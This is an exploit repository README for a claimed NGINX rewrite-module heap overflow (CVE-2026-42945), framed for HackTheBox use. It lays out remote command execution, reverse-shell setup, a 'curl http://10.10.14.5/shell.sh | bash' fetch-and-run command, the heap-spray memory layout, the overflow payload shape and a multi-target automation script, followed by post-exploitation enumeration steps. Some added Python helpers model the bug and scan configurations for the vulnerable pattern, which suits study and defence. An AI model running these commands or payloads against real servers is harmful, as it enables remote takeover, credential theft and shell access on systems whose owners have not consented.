cipherspy/CVE-2026-42945-POC


CVE-2026-42945 (NGINX Rift) - HTB-Ready Exploit

Standalone exploit for CVE-2026-42945, a heap buffer overflow in NGINX (discovered in 2024). This version is adapted for HackTheBox and CTF environments where you cannot set up Docker containers.

Vulnerability Details

CVE-2026-42945 is a critical heap buffer overflow in NGINX's ngx_http_rewrite_module that has existed since 2008 (version 0.6.27). The bug is triggered when:

  1. A rewrite directive has a ? in its replacement, which sets is_args = 1 on the script engine
  2. A set directive in the same location stores a regex capture ($1) taken from the URI
  3. The length pass that sizes the buffer runs on a zeroed sub-engine and sees is_args = 0, so it reserves room for the unescaped capture only
  4. The copy pass runs on the main engine, sees is_args = 1 and URI-escapes the capture as it writes it
  5. Every escaped byte becomes %XX, so the written data can be up to 3x the reserved size and overruns the heap buffer
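The five steps above as a small Python model (an added example for this README, not NGINX source and not the exploit's code): a stand-in for URI escaping sizes the capture once with is_args = 0 and then copies it with is_args = 1, reproducing the gap between what is reserved and what gets written. ESCAPE_ARGS is an assumption that approximates the byte set ngx_escape_uri percent-encodes in args mode (space, #, %, &, +, ;, ?, control bytes and non-ASCII bytes); PAGE_PAYLOAD reuses the 349 'A' + 969 '+' shape quoted later in this README.

```python
# Added example, not NGINX code: model of the length-pass / copy-pass mismatch.
# Assumption: ESCAPE_ARGS approximates what ngx_escape_uri percent-encodes in
# args mode (space # % & + ; ? plus control and non-ASCII bytes).
ESCAPE_ARGS = (
    frozenset(b" #%&+;?")
    | frozenset(range(0x00, 0x20))
    | frozenset(range(0x7F, 0x100))
)


def escape_args(capture: bytes) -> bytes:
    """Percent-encode every byte in ESCAPE_ARGS; each such byte becomes %XX."""
    out = bytearray()
    for b in capture:
        out += b"%%%02X" % b if b in ESCAPE_ARGS else bytes([b])
    return bytes(out)


def length_phase(capture: bytes, is_args: int) -> int:
    """Bytes reserved for the capture: escaped length only if is_args is set."""
    return len(escape_args(capture)) if is_args else len(capture)


def copy_phase(capture: bytes, is_args: int) -> bytes:
    """Bytes actually written for the capture by the copy pass."""
    return escape_args(capture) if is_args else capture


def overflow_for(capture: bytes) -> tuple:
    """Reproduce the bug: sized on a zeroed sub-engine (is_args=0), copied on
    the main engine (is_args=1). Returns (allocated, written, overrun)."""
    allocated = length_phase(capture, is_args=0)
    written = len(copy_phase(capture, is_args=1))
    return allocated, written, max(0, written - allocated)


# The payload shape this README cites: unescaped filler followed by '+' bytes
# that each expand to the three-byte sequence %2B during the copy pass.
PAGE_PAYLOAD = b"A" * 349 + b"+" * 969

if __name__ == "__main__":
    # Constructed inputs: a plain path and the README's payload shape.
    for label, cap in (("benign", b"users/42/profile"), ("payload", PAGE_PAYLOAD)):
        allocated, written, overrun = overflow_for(cap)
        print("%-8s allocated=%d written=%d overrun=%d" % (label, allocated, written, overrun))
```

The benign path shows no gap because none of its bytes is escaped; the payload shape reserves 1318 bytes and writes 3256, a 1938-byte overrun. A capture made only of unescaped bytes never expands, so the `?` in the replacement is harmless until the captured URI contains bytes the escaper rewrites.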

Affected Versions

  • NGINX Open Source: 0.6.27 - 1.30.0
  • NGINX Plus: R32 - R36

Fixed Versions

  • NGINX Open Source: 1.31.0, 1.30.1
  • NGINX Plus: R36 P4, R35 P2, R32 P6

Files Included

  1. nginx_rift_htb.py - Main exploit script
  2. nginx_rift_helper.py - Reconnaissance and info leak helper
  3. README.md - This file

Requirements

# Python 3.6+
sudo apt update
sudo apt install python3 netcat-openbsd

# No additional Python packages needed - uses only stdlib!

Quick Start

1. Check if Target is Vulnerable

python3 nginx_rift_htb.py --target 10.10.11.x --check-only

This will:

  • Detect if NGINX is running
  • Try to identify the version
  • Check for the /api/ endpoint
  • Report if target appears vulnerable

2. Reconnaissance (Recommended)

python3 nginx_rift_helper.py --target 10.10.11.x --all

This performs:

  • NGINX fingerprinting
  • Version detection
  • Endpoint discovery
  • Information leak detection
  • Behavioral analysis

3. Run the Exploit

Execute a command:

python3 nginx_rift_htb.py --target 10.10.11.x --port 80 --cmd "id"

Get a reverse shell:

# Start listener first (in another terminal)
nc -lvnp 4444

# Run exploit
python3 nginx_rift_htb.py --target 10.10.11.x --shell --lhost 10.10.14.5 --lport 4444

Usage Examples

Basic Command Execution

# Execute 'id' command
python3 nginx_rift_htb.py --target 10.10.11.23 --cmd "id"

# Execute 'whoami'
python3 nginx_rift_htb.py --target 10.10.11.23 --cmd "whoami"

# Read /etc/passwd
python3 nginx_rift_htb.py --target 10.10.11.23 --cmd "cat /etc/passwd"

Reverse Shell

# Terminal 1: Start listener
nc -lvnp 4444

# Terminal 2: Run exploit
python3 nginx_rift_htb.py \
    --target 10.10.11.23 \
    --shell \
    --lhost 10.10.14.5 \
    --lport 4444 \
    --verbose

Custom Addresses (If ASLR is disabled or you have leaks)

python3 nginx_rift_htb.py \
    --target 10.10.11.23 \
    --cmd "id" \
    --heap-base 0x555555659000 \
    --libc-base 0x7ffff77ba000

Advanced Options

python3 nginx_rift_htb.py \
    --target 10.10.11.23 \
    --port 8080 \
    --cmd "curl http://10.10.14.5/shell.sh | bash" \
    --tries 20 \
    --verbose

Understanding the Exploit

How It Works

  1. Heap spray: several POST requests carry bodies holding a fake ngx_pool_cleanup_s structure, so copies of it sit at predictable heap locations
  2. Overflow trigger: one GET request to /api/ carries a URI that expands during escaping and overruns the undersized capture buffer
  3. Cleanup hook: the overrun overwrites the cleanup pointer of an adjacent pool so that it points at one of the sprayed fake structures
  4. Code execution: when that pool is destroyed, NGINX walks its cleanup list and calls the fake handler, system(), with the command string as its argument

Key Parameters

  • Target bytes: the low 6 bytes of each address written by the overflow must consist only of bytes the URI escaper leaves untouched; any byte it would percent-encode turns into three bytes and breaks the pointer
  • Spray body: a 4000-byte POST body containing the fake cleanup structure
  • Overflow payload: 349 'A' followed by 969 '+' characters; the '+' bytes are escaped to %2B during the copy, tripling their size
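To check a leaked or guessed address against the target-bytes constraint above, here is an added helper (not part of the exploit) that reports which of the low six little-endian bytes of a 64-bit value the URI escaper would percent-encode. ESCAPE_ARGS is an assumption approximating ngx_escape_uri's args-mode table; the second address in the usage section is constructed from printable bytes for illustration, the first is the libc base this README uses as an example.

```python
# Added example, not part of the exploit: which bytes of an address would the
# URI escaper mangle? Assumption: ESCAPE_ARGS approximates the byte set that
# ngx_escape_uri percent-encodes in args mode.
ESCAPE_ARGS = (
    frozenset(b" #%&+;?")
    | frozenset(range(0x00, 0x20))
    | frozenset(range(0x7F, 0x100))
)


def unsafe_bytes(addr: int, width: int = 6) -> list:
    """Little-endian bytes of addr (the low `width` bytes) that would be escaped.

    Returns (offset, byte) pairs; an empty list means every byte survives the
    copy pass unchanged.
    """
    if not 0 <= addr < (1 << (8 * width)):
        raise ValueError("address %#x does not fit in %d bytes" % (addr, width))
    return [(i, b) for i, b in enumerate(addr.to_bytes(width, "little"))
            if b in ESCAPE_ARGS]


def is_uri_safe(addr: int, width: int = 6) -> bool:
    """True when the low `width` bytes of addr pass through escaping intact."""
    return not unsafe_bytes(addr, width)


if __name__ == "__main__":
    # 0x7ffff77ba000 is the README's example libc base; 0x7e5f2e2d4130 is a
    # constructed value whose six bytes are all printable and unescaped.
    for addr in (0x7FFFF77BA000, 0x7E5F2E2D4130):
        bad = unsafe_bytes(addr)
        print("%#014x safe=%s unsafe=%s"
              % (addr, not bad, ["+%d:%#04x" % (i, b) for i, b in bad]))
```

Checking with width=8 flags the two zero high bytes of any canonical user-space x86-64 pointer, since 0x00 is always escaped; that is consistent with the README writing only six bytes per address.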

ASLR Considerations

The exploit assumes either that ASLR is disabled or that you already know the heap and libc addresses (see --heap-base and --libc-base). On HTB:

  • Some boxes disable ASLR for easier exploitation
  • Others require finding an information leak
  • The helper script can assist with reconnaissance

If ASLR is enabled, you may need to:

  1. Find an info leak in the application
  2. Brute force (requires many attempts)
  3. Use partial overwrites (advanced)

Troubleshooting

"Target doesn't appear to be running NGINX"

  • Verify the target is actually running NGINX
  • Check if the port is correct
  • May be behind a WAF/proxy

"Could not confirm /api/ endpoint"

The exploit expects a location block that pairs a rewrite whose replacement contains ? with a set directive that stores a capture:

location ~ ^/api/(.*)$ {
    rewrite ^/api/(.*)$ /internal?migrated=true;
    set $original_endpoint $1;
}
  • The exploit may still work if rewrite+set exist elsewhere
  • Try different common paths: /api/, /admin/, /internal/

"All exploitation attempts failed"

Possible reasons:

  1. ASLR is enabled - addresses are randomized
    • Solution: find an info leak or brute force
  2. Different libc version - system() is at a different offset
    • Solution: try all offsets with --verbose
  3. Version not vulnerable - fixed version or different config
    • Solution: verify the version with the helper script
  4. WAF/IDS blocking - security controls in place
    • Solution: may need evasion techniques
  5. Wrong endpoint - not using the rewrite+set combination
    • Solution: find the actual vulnerable endpoint

Verbose Mode

Always use --verbose for debugging:

python3 nginx_rift_htb.py --target 10.10.11.23 --cmd "id" --verbose

This shows:

  • Each spray request status
  • Connection attempts
  • Overflow trigger timing
  • Crash detection logic

HTB-Specific Tips

Finding Your VPN IP

# Find your tun0 IP
ip addr show tun0 | grep inet

# Use this IP for --lhost
python3 nginx_rift_htb.py --target TARGET --shell --lhost YOUR_TUN0_IP --lport 4444

Stabilizing Shell

Once you get initial access:

# Upgrade to TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Background and set terminal
Ctrl+Z
stty raw -echo; fg
export TERM=xterm

Common HTB Enumeration After Shell

# Check current user
id
whoami

# Check for flags
find / -name "user.txt" 2>/dev/null
find / -name "root.txt" 2>/dev/null

# Check sudo permissions
sudo -l

# Check SUID binaries
find / -perm -4000 2>/dev/null

Advanced Usage

Custom Payload Generation

If you need to customize the payload:

# Edit the make_body() function in nginx_rift_htb.py
# Adjust BODY_LEN for different configurations
# Modify the overflow string (349 'A' + 969 '+')

Multiple Targets

# Create a target list (one IP per line)
cat targets.txt
10.10.11.23
10.10.11.24
10.10.11.25

# Test each one; read -r keeps backslashes literal, quoting keeps odd lines intact
while read -r target; do
    echo "Testing $target"
    python3 nginx_rift_htb.py --target "$target" --check-only
done < targets.txt

Automated Exploitation

#!/bin/bash
# Usage: <script> TARGET LHOST
if [ $# -ne 2 ]; then
    echo "Usage: $0 TARGET LHOST" >&2
    exit 1
fi
TARGET=$1
LHOST=$2
LPORT=4444

echo "[*] Starting listener on port $LPORT..."
nc -lvnp "$LPORT" &
LISTENER_PID=$!

sleep 2

echo "[*] Running exploit..."
python3 nginx_rift_htb.py \
    --target "$TARGET" \
    --shell \
    --lhost "$LHOST" \
    --lport "$LPORT" \
    --verbose

# Keep the script alive until the listener exits
wait "$LISTENER_PID"

Technical Details

Vulnerable Code Pattern

location ~ ^/api/(.*)$ {
    rewrite ^/api/(.*)$ /internal?migrated=true;  # Sets is_args=1
    set $original_endpoint $1;                     # Allocates based on is_args=0
}
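Both the Troubleshooting entry and the pattern above describe the same configuration shape, so here is one added example (not the project's code) that scans an nginx configuration for location blocks combining a rewrite whose replacement contains ? with a set directive that stores a numbered capture. It is a line-oriented scanner rather than a full nginx config parser (one directive per line, braces on their own or at line end), and it deliberately flags the pair in either order so it errs toward reporting; the sample configuration is constructed.

```python
import re
from typing import List

# Constructed sample: only the first location combines a rewrite with '?' in
# its replacement and a set directive that stores a capture.
SAMPLE_CONF = """
http {
    server {
        location ~ ^/api/(.*)$ {
            rewrite ^/api/(.*)$ /internal?migrated=true;   # sets is_args
            set $original_endpoint $1;                     # stores capture
        }
        location ~ ^/legacy/(.*)$ {
            rewrite ^/legacy/(.*)$ /v2/$1;                  # no '?'
            set $legacy_path $1;
        }
        location /static/ {
            rewrite ^/static/(.*)$ /assets?file=$1;         # no set
        }
    }
}
"""

LOCATION_RE = re.compile(r"^\s*location\s+(.*?)\s*\{")
REWRITE_RE = re.compile(r"^\s*rewrite\s+(\S+)\s+(\S+)")          # regex, replacement
SET_CAPTURE_RE = re.compile(r"^\s*set\s+\$\w+\s+[^;]*\$\d")       # set $var ...$N


def find_rewrite_set_pattern(conf: str) -> List[str]:
    """Return location headers whose block has both a rewrite with '?' in the
    replacement and a set directive that uses a numbered capture."""
    findings = []
    # Each stack entry: [location header or None, saw_args_rewrite, saw_set_capture]
    stack = []
    for raw in conf.splitlines():
        line = raw.split("#", 1)[0]          # drop trailing comments
        m = LOCATION_RE.match(line)
        if m:
            stack.append([m.group(1), False, False])
            continue
        if "{" in line:                      # http/server/if/etc.: anonymous block
            stack.append([None, False, False])
            continue
        if stack:
            m = REWRITE_RE.match(line)
            if m and "?" in m.group(2):
                stack[-1][1] = True
            if SET_CAPTURE_RE.match(line):
                stack[-1][2] = True
        if "}" in line and stack:
            header, saw_rewrite, saw_set = stack.pop()
            if header is not None and saw_rewrite and saw_set:
                findings.append(header)
    return findings


if __name__ == "__main__":
    for header in find_rewrite_set_pattern(SAMPLE_CONF):
        print("rewrite+set pattern in: location", header)
```

To check a live server, feed it the output of `nginx -T`, which dumps the effective configuration with all includes resolved.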

Exploitation Flow

1. Spray POST → Fill heap with fake cleanup structures
2. GET /api/AAAA...++++...X → Trigger overflow
3. Overflow corrupts adjacent pool cleanup pointer
4. Pool destroyed → Calls system(cmd)

Memory Layout

[Heap Spray Body - 4000 bytes]
+0:  system_addr (8 bytes)
+8:  data_addr (8 bytes) 
+16: next (8 bytes, NULL)
+24: command_string (variable)
+remaining: padding 'A'

Disclaimer

This tool is provided for educational purposes and authorized security testing only. Using this against systems you don't own or have explicit permission to test is illegal. The author assumes no liability for misuse.

Credits

  • Original vulnerability discovered by depthfirst
  • Original POC: p3Nt3st3r-sTAr
  • HTB adaptation: Modified for standalone use

License

Educational/Research purposes only. Use responsibly.
